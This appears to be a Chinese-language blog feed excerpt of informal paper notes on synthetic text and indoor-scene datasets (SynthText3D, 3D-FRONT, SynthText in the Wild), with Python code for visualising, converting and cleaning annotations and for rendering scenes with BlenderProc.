    ​ 假设 $p_j=(x_i,y_j)$ 是 2D 地图的坐标点,$d_j$ 是 $p_j$ 的深度值,则粗粒度 3D 坐标 $P=(X_j,Y_j,Z_j)$ 可以如下计算:

    $$\begin{bmatrix} X_j \ Y_j \ Z_j \end{bmatrix} = K \times d_j \times \begin{bmatrix} x_j \ y_j \ 1 \end{bmatrix}$$

    ​ 其中 $K$ 是相机的内部参考矩阵,它是相机的属性参数。整数深度的位置和浮点深度的位置之间出现偏差。

    jpg

    由整数深度和浮点深度计算的坐标。
    Pv:视点的坐标点;
    Pi:整数深度的坐标点;
    Pf:浮点深度的坐标点。

    ​ 为了获得细粒度的坐标,我们采用了光线投射,这是一个确定光线是否与物体相交以及在哪里相交的过程。如上图所示,我们初始化光线 $V=(P_i−P_v)$,其中 $P_i$ 是上式中估计的粗略点。然后,可以通过射线投射来获得细粒度点 $P_f$,该射线投射检测到离 $P_v$ 最近的命中点。

    ​ 最后通过迭代 3D 四边形来使得最后的边界框变成 3D 轴对齐的边界框。

    Text Deformation

    ​ 在自然情况下,并不是所有的文本区域都是平面,例如瓶子和衣服的表面,文本需要变形以适应目标表面。

    ​ 变形算法如下所示。我们将文本平面视为三角网格,将文本视为网格的纹理贴图。首先将网格的四个角顶点固定到区域角,然后将中间顶点变换到目标对象表面上最近的位置。最后,根据相对于角顶点的欧几里得距离来估计顶点的纹理坐标。

    jpg

    3.5.2 Rendering

    ​ 我们分别为每个场景建立了几个环境设置。对于每个室内场景,我们构建三种照明:正常照度、亮度和黑暗度。

    ​ 除了照明之外,我们还为室外场景添加了雾环境。

    ​ 渲染过程:Demonstration for Paper – SynthText3D: Synthesizing Scene Text Images from 3D Virtual Worlds - YouTube

    4. Experiments

    ​ 合成图像的硬件要求:

    • i7-8700 CPU
    • Nvidia GeForce GTX 1060 GPU
    • 16G RAM

    ​ 2 秒一张,大小为 720 * 1080

    4.1. Datasets

    ​ 用于评估和对比实验的数据集:

    • SynthText:800K 张,随机抽了 10K,就叫它 SynthText-10k。
    • VISD(10K)
    • ICDAR 2013(229+233)
    • ICDAR 2015(1000+500)
    • MLT(ICDAR2017,7200+1800+9000)

    4.2. Visual Analysis

    ​ 视觉分析两个关键因素影响合成数据的视觉效果。一个是合适的文本区域。另一个是渲染效果。

    4.2.1 Suitable Text Regions

    ​ 搁这吹自己 Text Regions 位置放的好呢。

    4.2.2 Rendering Effect

    ​ 搁这吹自己图像渲染得真实呢。

    4.3. Scene Text Detection

    ​ 使用 EAST,ResNet-50 作为 backbone,4 个 GPU,batch size 为 56。

    4.3.1 Pure Synthetic Data

    jpg

    ​ 比 SynthText 10K 好使!甚至我们 10K 的数据量比 800K 的 SynthText 都牛逼!

    ​ VISD 没有公开源码,只有数据集,我们的效果不如它,但是还是要嘴硬一句我们生成的图像在透视变换、各种照明和遮挡方面具有更逼真的外观。

    ​ 混合数据(我们的 5K+VISD 5K)进行训练来进行实验,效果最棒棒喔!

    4.3.2 Combination of Synthetic Data & Real Data

    jpg

    ​ 将合成数据集和真实数据集放一起 Train,效果还是比 VISD 低,真是气死宝宝了!

    ​ 继续嘴硬。VISD 使用 10K 真实世界背景图像,提供丰富的对象和纹理。然而,我们的合成图像是由基于大约 200 个相机锚点的 3D 虚拟世界投影的。这可能是我们的改进略低于 VISD 的原因。

    4.4. Limitations

    ​ 我们的方法的主要局限性是我们需要手动选择相机锚,尽管这相对容易实现,因为每个虚拟世界只有大约 20-30 个相机锚。然而,考虑到以前的方法也需要手动检查或注释来过滤包含文本的背景图像,我们的手动选择是可以接受的。我们将在未来的工作中尝试通过引入一种自动生成相机锚的算法来改进它。

    ​ 应该就是下一个论文了。

    5. Conclusion

    ​ 总结一下完事。

    代码

    数据集可视化

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    import numpy as np
    import cv2
    import os
    import matplotlib.pyplot as plt

    index = 27

    image_dir = r'E:\dataset\Synth3D-10K\img\\'
    label_dir = r'E:\dataset\Synth3D-10K\label\\'

    image_path = os.path.join(image_dir, str(index) + '.jpg')
    label_path = os.path.join(label_dir, str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape

    with open(label_path, "r") as file:
    data = file.read()

    lines = data.split("\n") # 按行分割文本
    result = []
    for line in lines:
    if len(line) > 1:
    values = line.split(",") # 按逗号分割字符串
    result.extend([float(s) for s in values])

    x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
    y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]

    for i in range(len(x_list)):
    x = x_list[i]
    y = y_list[i]
    points = np.array([x, y], np.int32).T
    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()

    png

    ​ 但是通过人工审查,有些图像的质量实在不敢恭维,这真的好使吗?

    png

    转换成 TotalText 形式

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    import numpy as np
    import os
    from tqdm import tqdm

    label_dir = r'E:\dataset\Synth3D-10K\label'
    save_dir = r"E:\dataset\Synth3D-10K\Txts"

    for index in tqdm(range(1, 10000 + 1)):
    label_path = os.path.join(label_dir, str(index) + '.txt')

    with open(label_path, "r") as file:
    data = file.read()

    lines = data.split("\n") # 按行分割文本
    result = []
    for line in lines:
    if len(line) > 1:
    values = line.split(",") # 按逗号分割字符串
    result.extend([float(s) for s in values])

    x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
    y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]

    string = ""

    for i in range(len(x_list)):
    x = x_list[i]
    y = y_list[i]
    points = np.array([x, y], np.int32).T

    string += 'x: [['
    string += ' '.join(map(str, x))
    string += ']], y: [['
    string += ' '.join(map(str, y))
    string += "]], ornt: [u'h"
    string += "'], transcriptions: [u'"
    string += "#"
    string += "']\n"
    with open(os.path.join(save_dir, "poly_gt_img" + str(index) + ".txt"), 'w', encoding='UTF-8') as file:
    file.write(string)
    1
    2
    3
    4
    5
    6
    7
    import os
    from tqdm import tqdm

    file_dir = r"E:\dataset\Synth3D-10K\Images\\"

    for file in tqdm(os.listdir(file_dir)):
    os.rename(os.path.join(file_dir, file), os.path.join(file_dir, "img" + file))

    保存可视化结果(TotalText 形式)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
import numpy as np
import cv2
import os
import matplotlib.pyplot as plt
from shapely.geometry import Polygon
from tqdm import tqdm

image_dir = r'D:\mindOCR_dataset\SynthText3D\Images\Train\\'
label_dir = r'D:\mindOCR_dataset\SynthText3D\Txts\Train\\'
save_dir = r'D:\mindOCR_dataset\SynthText3D\Images\Train3\\'

for index in tqdm(range(1, 10001)):
    image_path = os.path.join(image_dir, 'img' + str(index) + '.jpg')
    label_path = os.path.join(label_dir, 'poly_gt_img' + str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    try:
        label_file = open(label_path, 'r')
    except:
        continue
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
        x = [int(num) for num in annotation[annotation.find("x: [[") + 5: annotation.find("]], y: [[")].split()]
        y = [int(num) for num in annotation[annotation.find("y: [[") + 5: annotation.find("]], ornt: [")].split()]
        ornt = annotation[annotation.find("ornt: [u'") + 9: annotation.find("'], transcriptions: [")]

        points = np.array([x, y], np.int32).T

        cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
        for p in points:
            cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.imwrite(os.path.join(save_dir, str(index) + '.jpg'), image)

Cleaning the data

​ Sure enough, there is far too much erroneous data in it; fed straight into mindOCR it simply won't run, which makes me wonder whether the paper itself has problems. It needs cleaning:

​ Remove from the annotations the entries that are:

• too small

• mutually intersecting

• out of bounds

• otherwise invalid

​ and it just about runs.

​ Some of the data is wrong in more complicated ways; oh well, running at all is good enough.

import numpy as np
import cv2
import os
import matplotlib.pyplot as plt
from shapely.geometry import Polygon
from tqdm import tqdm


def check_intersection(polygon, polygon_list):
    # return True if `polygon` intersects any *other* polygon in the list
    for other_polygon in polygon_list:
        if polygon != other_polygon:
            if polygon.intersects(other_polygon):
                return True
    return False


image_dir = r'F:\dataset\Synth3D-10K\img\\'
label_dir = r'F:\dataset\Synth3D-10K\label\\'
save_dir = r'D:\mindOCR_dataset\SynthText3D\Txts\Train\\'
error_list = []

for index in range(1, 10000 + 1):
    image_path = os.path.join(image_dir, str(index) + '.jpg')
    label_path = os.path.join(label_dir, str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape

    with open(label_path, "r") as file:
        data = file.read()

    lines = data.split("\n")  # split the text into lines
    result = []
    for line in lines:
        if len(line) > 1:
            values = line.split(",")  # split each line on commas
            result.extend([float(s) for s in values])

    x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
    y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]
    points_list = []
    is_error = False

    for i in range(len(x_list)):
        x = x_list[i]
        y = y_list[i]
        points_list.append(Polygon(np.array([x, y], np.int32).T))

    if not is_error:
        string = ""
        for i in range(len(x_list)):
            x = list(map(int, x_list[i]))
            y = list(map(int, y_list[i]))

            polygon = Polygon(np.array([x, y], np.int32).T)

            if polygon.area < 200:
                is_error = True
                error_list.append(index)
                print(index, "quadrilateral too small", polygon.area)
                continue

            # a valid quadrilateral has 4 vertices plus the closing point
            if not (polygon.is_valid and len(polygon.exterior.coords) == 5):
                is_error = True
                error_list.append(index)
                print(index, "not a valid quadrilateral")
                continue

            if min(y) < 0 or min(x) < 0 or max(x) > width or max(y) > height:
                is_error = True
                error_list.append(index)
                print(index, "out of bounds")
                continue

            if check_intersection(polygon, points_list):
                is_error = True
                error_list.append(index)
                print(index, "intersects", polygon.area)
                continue

            string += 'x: [['
            string += ' '.join(map(str, x))
            string += ']], y: [['
            string += ' '.join(map(str, y))
            string += "]], ornt: [u'h"
            string += "'], transcriptions: [u'"
            string += "A"
            string += "']\n"
        if len(string) > 0:
            print("writing", index)
            with open(os.path.join(save_dir, "poly_gt_img" + str(index) + ".txt"), 'w', encoding='UTF-8') as file:
                file.write(string)
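​ A quick way to see what the is_valid test above catches: the same four corners in a crossed, "bow-tie" ordering produce a self-intersecting ring (a minimal sketch, purely illustrative):

from shapely.geometry import Polygon

good = Polygon([(0, 0), (10, 0), (10, 10), (0, 10)])     # corners in order
bowtie = Polygon([(0, 0), (10, 10), (10, 0), (0, 10)])   # crossed ordering

print(good.is_valid, len(good.exterior.coords))  # True 5 (4 vertices + closing point)
print(bowtie.is_valid)                           # False: the ring self-intersects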
    ]]>
@@ -5098,7 +5098,7 @@ /posts/Paper-3D-FRONT-3D%20Furnished%20Rooms%20with%20layOuts%20and%20semaNTics/ - Resources

Full text

    Abstract

​ The 3D-FRONT dataset:

• 3D Furnished Rooms with layOuts and semaNTics

• a new, large-scale, comprehensive repository of synthetic indoor scenes

• focused on professionally designed layouts

• a large number of rooms populated with high-quality, style-compatible textured 3D models

• from layout semantics down to the texture details of individual objects

​ The authors also release Trescope, a lightweight rendering tool that supports benchmark rendering of 2D images and annotations from 3D-FRONT.

    1. Introduction

​ The computer vision community has invested a great deal of effort in the study of 3D indoor scenes, from 3D reconstruction, visual SLAM, and navigation to scene understanding, affordance analysis, and generative modeling.

​ Existing 3D scene datasets fall into two broad categories: acquired (via scanning and reconstruction) and designed. Acquired meshes tend to be of low quality in terms of geometric fidelity and texture quality.

​ The paper introduces 3D-FRONT (3D Furnished Rooms with layOuts and semaNTics), a new, large-scale, comprehensive repository of synthetic 3D indoor scenes. It:

• contains professionally and distinctively designed layouts spanning 31 scene categories, with object semantics (e.g., category, style, and material labels),
• offers a large number (18,968) of rooms populated with 3D furniture objects,
• all of which have high-quality textures, thanks to 3D-FUTURE, a recently released dataset of high-quality 3D furniture used in industrial production.

​ It reviews the two broad categories of 3D datasets:

• Acquired Scenes

• Designed Scenes

​ and then discusses their current shortcomings; 3D-FRONT shares everything used to build the houses and is currently the most fully featured.

    3. Building 3D-FRONT

​ Starting from a collection of houses, the pipeline creates room suites, optimizes the layouts, verifies the created interior designs, and finally assigns qualified camera viewpoints.

(figure) The 3D-FRONT pipeline: start from an empty house with professional design ideas, create room suites, optimize the layout (e.g., resolving the artifacts highlighted in the red boxes), and finally verify the furnished rooms.

(figure) Viewpoint generation: each scene is associated with several natural camera views to ease rendering.

    3.1. Room Suite Creation

​ The design ideas for a room include the objects' category labels and their positions, orientations, sizes, and styles. Taking a bedroom as an example, a seed object, e.g., a bed, is first picked at random from the 3D model pool according to the required size and style. Furniture that visually matches the room suite so far is then identified iteratively until the room is filled.

​ This mainly relies on the Furniture Suite Composition (FSC) method from 3D-FUTURE to create visually compatible suites. Concretely, leveraging large-scale expert scene designs, two tasks are performed to model visual compatibility: mask prediction and suite compatibility scoring.

• The first task predicts a masked (removed) piece of furniture in a suite given the other objects.
• The second task scores the compatibility of an input suite. Each object (piece of furniture) is represented by its texture image.

​ 3D-FUTURE first uses visual embeddings extracted from a VEN to perform a preliminary ranking, and then a trained GBDT-LR model to re-rank the selected candidates for online recommendation. The primary ranking stage is improved here by incorporating graph auto-encoder techniques.

    3.2. Layout Optimization and Verification

Layout optimization starts from the initially created design and slightly adjusts the object positions in the room suite to satisfy several layout constraints, including pairwise distances, focal distances, distances to walls, reachability, and collisions.

​ The created designs are further verified, and unsatisfactory ones are removed, to ensure the quality of the dataset.

    3.3. Viewpoint Generation

Viewpoint generation aims to assign multiple cameras to each scene and to ensure that most cameras have practical viewpoints.

    4. Validation and Assessment

​ This section provides several ways to validate and assess how the dataset was built as well as the quality and utility of the data.

• recommender-system evaluation
• user studies
• properties of 3D-FRONT
  • All the essential data enabling the modeling of high-quality indoor scenes, from layout semantics down to the style and texture details of individual objects, is shared publicly.
  • 3D-FRONT enables a variety of 3D-scene-related AI tasks, including data-driven design research such as floor-plan synthesis, indoor scene synthesis, and scene-suite compatibility prediction, which other scene datasets cannot adequately support. It also benefits research on 3D scene understanding topics such as SLAM, 3D scene reconstruction, and 3D scene segmentation.

    5. Applications

    5.1. Interior Scene Synthesis

Interior scene synthesis.

    5.2. Texturing 3D Models in Indoor Scenes

​ Texturing 3D models in indoor scenes.

​ TM-Net, a recent textured-mesh generative model, is extended to the 3D scene texturing task.

​ After training the generative model, textures are synthesized for random shapes and used as conditions for the other objects.

    6. Conclusion and future work

​ So much for the specifics of how this dataset is synthesized.

    BlenderProc

Download the dataset, then run it with this code:


1. Import the relevant libraries:
  • blenderproc: a library for processing and rendering 3D models.
  • argparse: for parsing command-line arguments.
  • os: for file and directory operations.
  • numpy: for numerical computation.
import blenderproc as bproc
import argparse
import os
import numpy as np
2. Parse the command-line arguments:

  • Create an argument parser with the argparse library.

  • Add four required arguments: front, future_folder, front_3D_texture_path, and output_dir.

  • Parse the command-line arguments and store them in args.

parser = argparse.ArgumentParser()
parser.add_argument("front", help="Path to the 3D front file")
parser.add_argument("future_folder", help="Path to the 3D Future Model folder.")
parser.add_argument("front_3D_texture_path", help="Path to the 3D FRONT texture folder.")
parser.add_argument("output_dir", help="Path to where the data should be saved")
args = parser.parse_args()
3. Check that the folders exist:

  • Use os.path.exists() to check that the two folders exist.

  • If either folder is missing, raise an exception.

if not os.path.exists(args.front) or not os.path.exists(args.future_folder):
    raise Exception("One of the two folders does not exist!")
4. Initialize:
  • Initialize with bproc.init().
bproc.init()
5. Load the 3D-FRONT objects:

  • Load the FRONT-3D objects with bproc.loader.load_front3d().

  • Pass in the 3D-FRONT json path (json_path), the 3D-FUTURE model folder (future_model_path), the 3D-FRONT texture folder (front_3D_texture_path), and the label mapping (label_mapping).

  • Store the loaded objects in loaded_objects.

mapping_file = bproc.utility.resolve_resource(os.path.join("front_3D", "3D_front_mapping.csv"))
mapping = bproc.utility.LabelIdMapping.from_csv(mapping_file)

# set the light bounces
bproc.renderer.set_light_bounces(diffuse_bounces=200, glossy_bounces=200, max_bounces=200,
                                 transmission_bounces=200, transparent_max_bounces=200)

# load the front 3D objects
loaded_objects = bproc.loader.load_front3d(
    json_path=args.front,
    future_model_path=args.future_folder,
    front_3D_texture_path=args.front_3D_texture_path,
    label_mapping=mapping
)

# Init sampler for sampling locations inside the loaded front3D house
point_sampler = bproc.sampler.Front3DPointInRoomSampler(loaded_objects)
6. Initialize the sampler and the BVH tree:

  • Initialize the sampler with bproc.sampler.Front3DPointInRoomSampler() for sampling points inside the loaded rooms.

  • Create a BVH tree containing all mesh objects with bproc.object.create_bvh_tree_multi_objects().

# Init bvh tree containing all mesh objects
bvh_tree = bproc.object.create_bvh_tree_multi_objects([o for o in loaded_objects if isinstance(o, bproc.types.MeshObject)])
7. Loop to generate camera poses:

  • Initialize the number of attempts (tries) and the number of generated poses (poses).

  • Generate different camera poses in a loop.

  • Randomly sample the camera height and rotation, and build the camera-to-world transformation matrix (cam2world_matrix) from them.

  • Check that the generated view qualifies: the scene coverage score is above 0.8, obstacles are at least 1 meter from the camera with an average distance between 2.5 and 3.5 meters, no background is visible, and the view is interesting enough.

  • If it qualifies, add the camera pose to the rendering pipeline and increment poses.

  • Increment tries.

poses = 0
tries = 0


def check_name(name):
    for category_name in ["chair", "sofa", "table", "bed"]:
        if category_name in name.lower():
            return True
    return False


# filter some objects from the loaded objects, which are later used in calculating an interesting score
special_objects = [obj.get_cp("category_id") for obj in loaded_objects if check_name(obj.get_name())]

proximity_checks = {"min": 1.0, "avg": {"min": 2.5, "max": 3.5}, "no_background": True}
while tries < 10000 and poses < 10:
    # Sample point inside house
    height = np.random.uniform(1.4, 1.8)
    location = point_sampler.sample(height)
    # Sample rotation (fix around X and Y axis)
    rotation = np.random.uniform([1.2217, 0, 0], [1.338, 0, np.pi * 2])
    cam2world_matrix = bproc.math.build_transformation_mat(location, rotation)

    # Check that obstacles are at least 1 meter away from the camera, that their average distance is between 2.5 and 3.5 meters, that no background is visible, and finally that the view is interesting enough
    if bproc.camera.scene_coverage_score(cam2world_matrix, special_objects, special_objects_weight=10.0) > 0.8 \
            and bproc.camera.perform_obstacle_in_view_check(cam2world_matrix, proximity_checks, bvh_tree):
        bproc.camera.add_camera_pose(cam2world_matrix)
        poses += 1
    tries += 1
8. Configure the renderer:

  • Enable normals output with bproc.renderer.enable_normals_output().

  • Enable segmentation output, mapped by category ID, with bproc.renderer.enable_segmentation_output().

# Also render normals
bproc.renderer.enable_normals_output()
bproc.renderer.enable_segmentation_output(map_by=["category_id"])
9. Render the whole pipeline:

  • Render the whole pipeline, scene and all outputs, with bproc.renderer.render().

  • Store the rendering results in data.

# render the whole pipeline
data = bproc.renderer.render()
10. Write the data to an .hdf5 file:
  • Write the rendered data into an .hdf5 container with bproc.writer.write_hdf5().
  • The output path is args.output_dir.
# write the data to a .hdf5 container
bproc.writer.write_hdf5(args.output_dir, data)
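​ Assuming the script above is saved as main.py, it would be launched through the BlenderProc CLI roughly like this (all paths are placeholders for local copies of 3D-FRONT and 3D-FUTURE):

blenderproc run main.py 3D-FRONT/<scene>.json 3D-FUTURE-model 3D-FRONT-texture output/
blenderproc vis hdf5 output/0.hdf5

The second command opens one of the written .hdf5 containers for a quick look.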

(figure: a rendered sample)

​ Doesn't seem to be much use, though...

    ]]>
@@ -5181,7 +5181,7 @@ /posts/Paper-%E9%87%8D%E8%AF%BB-Synthetic%20Data%20for%20Text%20Localisation%20in%20Natural%20Images/ - Resources

Original paper

    Abstract

1. A dataset synthesis engine that overlays synthetic text onto existing background images in a natural way, accounting for local 3D scene geometry.
2. FCRN, a new fully-convolutional regression network that tackles text detection, achieving an 84.2% F-score on ICDAR 2013.

    1 Introduction

1. Motivates text spotting and notes that the detection pipeline has become its new bottleneck: in one text recognition network, accuracy on correctly cropped words is 98%, while the end-to-end text spotting F-score is only 69%.

2. Proposes a new dataset synthesis engine; the generated dataset is called SynthText in the Wild.

3. Also proposes a text detection model, though it is so old that it is probably no longer used.

The related work covers:
1. CNN-based object detection
2. synthetic datasets
3. data augmentation methods

    2 Synthetic Text in the Wild

The proposed synthesis engine is:

1. realistic
2. automated
3. fast

The text generation pipeline:

1. acquire suitable text and image samples

2. segment the image into contiguous regions based on local color and texture cues

3. obtain a dense per-pixel depth map with a CNN

4. estimate a local surface normal for each contiguous region

5. choose a color for the text, and optionally an outline, based on the region's color

6. render the text sample with a randomly selected font and transform it according to the local surface orientation

7. blend the text into the scene using Poisson image editing

(figure)
(Top, left to right):
(1) RGB input image with no text instances.
(2) Predicted dense depth map (darker is closer).
(3) gPb-UCM color and texture segmentation.
(4) Filtered regions: regions suitable for text are colored randomly; unsuitable ones keep their original image pixels.
(Bottom): four synthesized scene-text images with axis-aligned, word-level bounding-box annotations.

    2.1. Text and Image Sources

• Text: words, lines, and paragraphs are sampled from the Newsgroups20 dataset.

• For diversity, 8,000 images were fetched from Google Image Search, and images containing text were discarded after manual inspection.

    2.2. Segmentation and Geometry Estimation

(figure)
Locally color/texture-sensitive placement.
(Left) A sample image from the synthetic text dataset. Note that the text is constrained to the steps on the street.
(Right) In contrast, the text placement in this image ignores the local region cues.
• In real images, text tends to be contained in well-defined regions (e.g., a sign). This constraint is approximated by requiring text to be contained in regions characterized by uniform color and texture. Regions are obtained by thresholding the gPb-UCM contour hierarchy at 0.11.
• In natural images, text tends to be painted on top of surfaces (e.g., a sign or a cup). The synthetic data approximates a similar effect by perspective-transforming the text according to the local surface normal. The normal is estimated automatically by first predicting a dense depth map for the segmented regions with a CNN and then fitting a planar facet to it with RANSAC.
• Text is aligned to the estimated region orientation as follows:
  • first, the image region contour is warped to a frontal-parallel view using the estimated plane normal;
  • then, a rectangle is fitted to the frontal-parallel region;
  • finally, the text is aligned to the larger side ("width") of this rectangle.
  • When placing multiple text instances in the same region, the text masks are checked for collisions so they are not placed on top of each other.
• Not every segmented region is suitable for text placement: a region should not be too small, have an extreme aspect ratio, or have a surface normal orthogonal to the viewing direction; all such regions are filtered out at this stage. Overly textured regions are also filtered, where the degree of texture is measured by the strength of third-order derivatives in the RGB image.

• An alternative to the (error-prone) CNN depth estimation is to use RGBD image datasets. The imperfect estimated depth map is preferred because:

  • it essentially allows background images of any scene type, not just those with RGBD data available,

  • and the publicly available RGBD datasets all have strong limitations.

    2.3. Text Rendering and Image Composition

• Once the location and orientation of the text have been decided, the text is assigned a color. The color palette for text is learned from cropped word images in the IIIT5K word dataset. The pixels in each cropped word image are partitioned into two groups using K-means, producing a color pair, with one color approximating the foreground (text) color and the other the background (see the sketch after this list). When rendering new text, the color pair whose background color best matches the target image region (using the L2 norm in Lab color space) is chosen, and the corresponding foreground color is used to render the text.

• About 20% of the text instances are randomly chosen to have a border. The border color is either the foreground color with its value channel increased or decreased, or the mean of the foreground and background colors.

• To preserve the illumination gradient in the synthetic text image, the text is blended onto the base image with Poisson image editing.
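​ A minimal sketch of that K-means color-pair idea using OpenCV (illustrative only; 'word_crop.jpg' is a hypothetical cropped word image, and the paper's actual pipeline differs in its details):

import cv2
import numpy as np

word = cv2.imread('word_crop.jpg')
pixels = word.reshape(-1, 3).astype(np.float32)

# partition the pixels into 2 clusters: one center approximates the text color,
# the other the background color
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
_, labels, centers = cv2.kmeans(pixels, 2, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)

fg, bg = centers  # a (foreground, background) color pair; which is which is not guaranteed
print(fg, bg)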

    3. A Fast Text Detection Network

    3.1. Architecture

​ Skipping this.

    4. Evaluation

    4.1. Datasets

    • SynthText in the Wild
    • ICDAR Datasets
    • Street View Text

    4.2. Text Localisation Experiments

​ It works well.

    4.3. Synthetic Dataset Evaluation

​ Three synthetic training datasets of increasing complexity were generated:

1. text placed at random positions in the image
2. text constrained by local color and texture boundaries
3. text perspective-distorted to match the local scene depth (while also respecting the local color and texture boundaries as in (2)).

​ All other aspects of the datasets are held fixed, e.g., the text lexicon, background images, and color distributions.

    4.4. End-to-End Text Spotting

​ Performance on end-to-end text spotting.

    4.5. Timings

​ The speed is good!

    5. Conclusion

​ The designed model does not do well when trained on existing datasets, but does very well with the help of the synthetic dataset.

A. Appendix

    A.1. Variation in Fonts, Colors and Sizes

(figure)

​ The images show synthetic renderings of the same text, "vamos!".

​ Along each row, the text is rendered at roughly the same position on the same background image, but with different fonts, colors, and sizes.

    A.2. Poisson Editing vs. Alpha Blending

(figure)

​ Comparison of naive alpha blending (bottom row) and Poisson editing (top row).

​ Poisson editing preserves local illumination gradients and texture details.

    A.3. SynthText in the Wild

(figure)

​ These images show text instances in varying fonts, colors, and sizes, with borders and shadows, on different backgrounds, transformed according to local geometry and constrained to locally contiguous regions of color and texture. Ground-truth bounding boxes are marked in red.

    A.4. ICDAR 2013 Detections

(figure)

​ Example detections on the ICDAR 2013 dataset from "FCRNall + multi-filt" (top row) and from Jaderberg et al. (bottom row). Precision, recall, and F-measure (P / R / F) are shown at the top of each image.

    A.5. Street View Text (SVT) Detections

(figure)

​ Example detections on the Street View Text (SVT) dataset from "FCRNall + multi-filt" (top row) and from Jaderberg et al. (bottom row).

​ Precision, recall, and F-measure (P / R / F) are indicated at the top of each image: both methods achieve a precision of 1 on these images (except for one case caused by missing ground-truth annotations).

Parsing the dataset

​ Download SynthText.zip from Synthetic Data for Text Localisation in Natural Images - Academic Torrents and unzip it:

(figure)

​ Each folder contains one scene, holding a number of images; gt.mat stores the annotations for these images.

​ On parsing gt.mat, see: SynthText文本数据详细解析_synthtext数据集_Mr.Q的博客-CSDN博客

​ Read the gt.mat file with Python:

import scipy.io as sio

# read the MAT file
data = sio.loadmat(r'D:\dataset\SynthText\SynthText\gt.mat')

​ It contains the following fields:

• imnames: image paths
• txt: text content
• wordBB: word-level bounding boxes
• charBB: character-level bounding boxes
    len(data['imnames'][0]), len(data['txt'][0]), len(data['wordBB'][0]), len(data['charBB'][0])
    (858750, 858750, 858750, 858750)
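​ For a given index, wordBB is laid out as a 2 × 4 × N array (x/y rows, 4 corners, N words); when an image contains a single word the trailing axis is squeezed away, which is exactly what the isinstance(..., np.ndarray) branches below are coping with. A quick shape check (expected shapes, not verified output):

print(data['wordBB'][0][index].shape)  # (2, 4, N) for N words, (2, 4) when N == 1
print(data['charBB'][0][index].shape)  # same layout at the character level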

Visualizing the dataset:

import cv2
import os
import matplotlib.pyplot as plt
import numpy as np

index = 92

file_dir = r'D:/dataset/SynthText/SynthText/'

image_path = os.path.join(file_dir, data['imnames'][0][index][0])

image_origin = cv2.imread(image_path)
image_bbox = image_origin.copy()
image_cbox = image_origin.copy()
height, width, _ = image_origin.shape

txt = []
for element in list(data['txt'][0][index]):
    txt.extend(element.split())

if isinstance(data['wordBB'][0][index][0][0], np.ndarray):
    for i in range(len(data['wordBB'][0][index][0][0])):  # bbox
        x = [int(num) for num in data['wordBB'][0][index][0][:, i]]
        y = [int(num) for num in data['wordBB'][0][index][1][:, i]]
        points = np.array([x, y], np.int32).T
        transcriptions = txt[i]

        cv2.polylines(image_bbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
        for p in points:
            cv2.circle(image_bbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

        cv2.putText(image_bbox, transcriptions, (x[0], y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
                    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))
else:
    x = [int(num) for num in data['wordBB'][0][index][0]]
    y = [int(num) for num in data['wordBB'][0][index][1]]
    points = np.array([x, y], np.int32).T
    transcriptions = txt[0]

    cv2.polylines(image_bbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
        cv2.circle(image_bbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image_bbox, transcriptions, (x[0], y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
                min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

if isinstance(data['charBB'][0][index][0][0], np.ndarray):
    for i in range(len(data['charBB'][0][index][0][0])):  # cbox
        x = [int(num) for num in data['charBB'][0][index][0][:, i]]
        y = [int(num) for num in data['charBB'][0][index][1][:, i]]
        points = np.array([x, y], np.int32).T

        cv2.polylines(image_cbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
        for p in points:
            cv2.circle(image_cbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
else:
    x = [int(num) for num in data['charBB'][0][index][0]]
    y = [int(num) for num in data['charBB'][0][index][1]]
    points = np.array([x, y], np.int32).T

